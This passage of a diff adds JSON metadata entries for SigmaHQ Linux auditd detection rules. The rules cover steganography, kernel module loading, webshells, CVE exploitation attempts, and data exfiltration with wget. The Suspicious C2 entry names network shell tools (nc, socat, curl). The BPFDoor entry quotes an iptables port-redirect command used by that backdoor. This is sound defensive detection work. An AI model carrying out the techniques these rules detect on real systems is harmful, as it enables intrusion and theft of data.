"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux" + }, + { + 
"description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with Steghide" + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_user_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery" + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; 
wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_susp_c2_commands.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/24", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://linux.die.net/man/1/xclip", + "https://attack.mitre.org/techniques/T1115/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd" + }, + { + "description": "Detects extraction of files with usage of steghide binary, the 
adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide" + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_load_module_insmod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://attack.mitre.org/techniques/T1547/006/", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ] + }, + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod" + }, + { + "description": "Detects 
possible command execution by web application/web shell", + "meta": { + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "filename": "lnx_auditd_web_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution" + }, + { + "description": "Detects exploitation attempt of the vulnerability described in CVE-2021-4034.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_4034.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "Potential CVE-2021-4034 Exploitation Attempt" + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/21", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencapture_import.yml", + "level": "low", + "logsource.category": "No 
established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool" + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/22", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_disable_system_firewall.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1562/004/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ] + }, + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall" + }, + { + "description": "Detects extracting of zip file from image file", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + 
"https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File" + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/28", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_capabilities_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ] + }, + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_system_info_discovery2.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery" + }, + { + "description": "Detect changes in auditd configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_auditing_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Self Experience", + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host" + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ] + }, + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload" + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "lnx_auditd_masquerading_crond.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process" + }, + { + "description": "Detects appending of zip file to image", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + 
"falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "lnx_auditd_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux" + }, + { + "description": "Detects command line parameter very often used with coin miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/09", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "filename": "lnx_auditd_coinminer.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + 
"attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + ], + "filename": "lnx_auditd_network_sniffing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux" + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/18", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "filename": "lnx_auditd_data_exfil_wget.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget" + }, + { + "description": "Detects a reload or a start of a service.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Installation of legitimate service.", + "Legitimate reconfiguration of service." + ], + "filename": "lnx_auditd_pers_systemd_reload.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux" + }, + { + 
"description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/10/01", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_image_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/xclip", + "https://attack.mitre.org/techniques/T1115/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + "value": "Clipboard Collection of Image Data with Xclip Tool" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt" + }, + { + "description": "All TCP traffic on particular port from attacker is 
routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate ports redirect" + ], + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect" + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/23", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy web applications" + ], + "filename": "lnx_auditd_susp_exe_folders.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ] + }, + "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders" + }, + { + "description": "Detects removing immutable file attribute.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": 
"2019/09/23", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." 
+ ], + "filename": "lnx_auditd_data_compressed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_network_service_scanning.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network Service Scanning - Auditd" + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/13", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencaputre_xwd.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/xwd", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - Linux" + }, + { + "description": "Detects access to a raw disk on a host to evade detection by security products.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
